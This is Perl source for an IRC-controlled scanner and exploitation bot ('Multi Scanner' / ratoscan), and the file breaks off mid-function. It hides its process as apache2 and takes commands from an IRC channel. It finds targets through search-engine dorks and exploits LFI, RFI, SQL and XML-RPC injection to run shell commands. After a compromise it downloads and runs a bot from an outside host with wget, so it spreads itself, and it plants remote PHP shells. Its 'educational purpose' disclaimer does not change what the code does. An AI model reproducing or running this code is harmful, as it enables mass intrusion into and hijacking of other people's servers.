#!

/usr/bin/perl
$powered="preda";
$mail="prd@preeeeeda.users.undernet.org";
##############################################################################
#######
##
##
##
23/07/201
0
##
## Author : BaMbY, Voo_Doo
##
## Team
: Irc.Byroe.Net
##
## Modifier : rato
##
## Team
: Irc.NairaLanders.Net
##
##
##
## ## DISCLAIMER ###########################################################
##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY #
##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK!!!
#
##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS FIND BUGS ON
#
##
## # THEIR SYSTEM.
#
##
## ## END OF DISCLAIMER ####################################################
##
##
##
## Features:
##
##
[+]e107 Injection Scanner
##
##
[+]Sql Injection Scanner
##
##
[+]XML (Extensible Markup Language) Injection Scanner
##
##
[+]Remote File Inclusion Scanner
##
##
[+]Local File Inclusion Scanner
##
##
[+]Integrated Shell, so you can execute commands on the server
##
##
[+]Spread Mode, to activate or disable Spread Function
##
##
##
##############################################################################
#######
################################################
use HTTP::Request;
#
use LWP::UserAgent;
#
use IO::Socket;
#
use IO::Select;
#
use IO::Socket::INET;
#

use Socket;
#
use HTTP::Request::Common;
#
use LWP::Simple;
#
use LWP 5.64;
#
use HTTP::Request::Common qw(POST);
#
use Digest::MD5 qw(md5_hex);
#
use MIME::Base64;
#
################################################
#
#
################################################
#
[CONFIGURATION]
#
################################################
my $fakeproc
= "/usr/sbin/apache2 -k start";
$ircserver
= "Diemen.NL.EU.Undernet.Org";
my $ircport
= "6667";
my $nickname
= "predascan1";
my $ident
= "prdsc1";
my $channel
= "#mynet";
my $runner
= "preda";
my $fullname
= 'prdsc1';
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/enviro
n%00";
my $rfiid
= "http://jewelleryoutlook.com/js/cmd.jpg?";
################################################
#
[COMMANDS]
#
################################################
my $lfi
= "!lfi";
my $xml
= "!xml";
my $e107
= "!e107";
my $sql
= "!sql";
my $rfi
= "!rfi";
my $cmdlfi
= "!cmdlfi";
my $cmde107
= "!cmde107";
my $cmdxml
= "!cmdxml";
################################################
#
[END OF CONFIGURATION]
#
################################################
my @tabele
= ('admin','tblUsers','tblAdmin','user','users','usernam
e','usernames','usuario',
'name','names','nombre','nombres','usuar
ios','member','members','admin_table','miembro','miembros','membername','admins'
,'administrator',
'administrators','passwd','password','pa
sswords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_
name','user_names',
'member_password','mods','mod','moderato
rs','moderator','user_email','user_emails','user_mail','user_mails','mail','emai
ls','email','address',
'e-mail','emailaddress','correo','correo
s','phpbb_users','log','logins','login','registers','register','usr','usrs','ps'
,'pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','ni
ck','nicks','manager','managers','administrador','tUser','tUsers','administrador
es','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','co
ntrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logo
n','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','faz
erlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_
authors','accounts','account','accnts',

'associated','accnt','customers','custom
er','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','pa
ssword','amministratore','god','God','authors',
'asociado','asociados','autores','member
name','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios
','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIE
MBRO');
my @kolumny
= ('admin_name','cla_adm','usu_adm','fazer','logon','faz
erlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','us
er_name','user_username','uname','user_uname','usern','user_usern','un','user_un
','mail',
'usrnm','user_usrnm','usr','usernm','use
r_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id'
,'author',
'sistema_usuario','auth','key','memberna
me','nme','unme','psw','password','user_password','autores','pass_hash','hash','
pass','correo',
'userpass','user_pass','upw','pword','us
er_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','
authors',
'user_pwd','u_pass','clave','usuario','c
ontrasena','pas','sistema_password','autor','upassword','web_password','web_user
name');
$SIG{'INT'}
= 'IGNORE';
$SIG{'HUP'}
= 'IGNORE';
$SIG{'TERM'}
= 'IGNORE';
$SIG{'CHLD'}
= 'IGNORE';
$SIG{'PS'}
= 'IGNORE';
chdir("/tmp");
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
&SIGN();
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_c
on", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname
");
sleep 1;
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
}
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(99));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :14,17ratoscan Multi7-14Scanner is Ready To 7S14can!
");
sendraw("PRIVMSG $runner :14,17H14i $runner my 7L14ord, I'm ready to work for
7Y14ou!!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircpo
rt"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
if ($msg=~ /PRIVMSG $channel :!help/){

sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)

14 ################## 7Vuln Scanner 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 ( $rfi/$lfi/$sql/$xml ) [bug] [dork]
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################### 7RCE Command 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 $e107 [dork]
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################# 7Execute Command 14#################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 #7 ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd] 14#");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################### 7md5 Command 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 !dec / !enc
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 #################### 7BOT Info 14#####################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 # 7 !resp
on | !engine | !pid | !version | !about 14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ###################################################");
}
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Version14) 14 Multi
Scanner v2.1");
}
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Engine14)7 Google, B
ing, AllTheWeb, Altavista, ASK, UOL, Yahoo.");
}
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14PID14)14 Process/ID
: 7 $fakeproc - $$");
}
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Multi Sc
anner v2");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Coded by
BaMbY7 | 14Modified By RatoScan ");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Copyrigh
t ? 2010 NairaLanders");
}
##################################################################### CM
D IRC
if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
my $enc = $1;
&enc($enc);
}
if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
my $dec = $1;
&dec($dec);
}
if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
my $cnls = $1;
&join($cnls);
}
if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
my $cnls = $1;
&part($cnls);

}
if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){
my $cnls = $1;
&quit($cnls);
}
if ($msg=~ /PRIVMSG $channel :!respon/){
my $re = query($rfiid);
if ( $re =~ /ByroeNet/ ) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Info14) 7 Respon
se is 3WORKING!");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Info14) 7 Respon
se is 4NOT WORKING!");
}
}
##################################################################### CM
D LFI
if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1."../../../../../../../../../../../../../../
../proc/self/environ%00";
my $cmd = $2;
&cmdlfi($url,$cmd);
}
#####################################################################
#####################
LFI LFI LFI
###################
##################################################################### Go
ogle Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Sea
rch Engines Loading ...");
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;

&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine

if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {

if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
#####################
XML XML XML
###################
################################################################
#####
if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd);
}
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Sea
rch Engines Loading ...");
&xmlscan($engx,$bugx,$d0rk);
}
exit;

}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {

if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
################################################################
#####
#####################
RFI RFI RFI
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Dor

k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Sea
rch Engines Loading ...");
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}

}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
################################################################
#####
#####################
SQL SQL SQL
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Sea
rch Engines Loading ...");
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {

if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}

################################################################
#####
#####################
e107 e107 e107
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd);
}
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = "/contact.php";
my $d0rk = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Do
rk :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Fi
le :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Se
arch Engines Loading ...");
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);

}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
##################################################################### Procedure
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
$browser->agent("$hie");
$browser->timeout(3);
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
print $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI-CMD14)7 $1");
}
}
sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @lfigoogle=&google($dork);
push(@lfitotal, @lfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @lfialltheweb=&alltheweb($dork);
push(@lfitotal, @lfialltheweb);

}
if ($engz =~ /Bing/) {
my @lfiBing=&Bing($dork);
push(@lfitotal, @lfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @lfialtavista=&altavista($dork);
push(@lfitotal, @lfialtavista);
}
if ($engz =~ /AsK/) {
my @lfiask=&ask($dork);
push(@lfitotal, @lfiask);
}
if ($engz =~ /UoL/) {
my @lfiuol=&uol($dork);
push(@lfitotal, @lfiuol);
}
if ($engz =~ /YahOo/) {
my @lfiyahoo=&yahoo($dork);
push(@lfitotal, @lfiyahoo);
}
my @lficlean = &calculate(@lfitotal);
if (scalar(@clean) != 0) {
}
my $uni=scalar(@lficlean);
foreach my $lfitarget (@lficlean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4@14$engz14) Sc
anning Done For7 $dork");
}
my $lfi = "../../../../../../../../../../../../../../..";
my $xpl = "http://".$lfitarget.$bugz.$rspo_test;
my $vuln = "http://".$lfitarget."2".$bugz."12".$rspo_test."";
my $re = getcontent($xpl);
if ($re =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; }
else {
my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
$rspo =~ s/\n//g;
if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
my ($sys,$uid) = ($1,$2);
my $lfispread = "cd /tmp;lwp-download
http://www.otbr.com.br/bot.txt;perl bot.txt;rm -rf *.txt*;wget http://www.otbr.c
om.br/bot.txt;perl bot.txt;rm -rf *.txt*";
my $tmp = "/tmp/cmd".int rand(2010);
my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread
"); sleep(1);
my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'%
00');
if ($res =~ /ratoscan4/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4
@14$engz14)14(7@14PHPSheLL14)3 http://".$lfitarget."12".$bugz."10".$lfi."6".$tmp."%00 14(0".
$sys."14)");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14LFI14)(4@1
4$engz14)14(7@14PHPSheLL14)3 http://".$lfitarget."12".$bugz."10".$lfi."6".$tmp."%00 14(0".$
sys."14)");
}
else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4

@14$engz14)14(7@14System14)3 http://".$lfitarget."12".$bugz."10[LFI] 14(0".$sys." 14uid=".$u
id."14)");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14LFI14)(4@1
4$engz14)14(7@14System14)3 http://".$lfitarget."12".$bugz."10[LFI] 14(0".$sys." 14uid=".$ui
d."14)");
}
}
else {
}
} exit } sleep(3);
}
}
}
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';echo`".$dwa."`;echo'solo';exit;/*</name></value
></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content
=> $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML-CMD14)7 $1");
}
}
sub xmlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
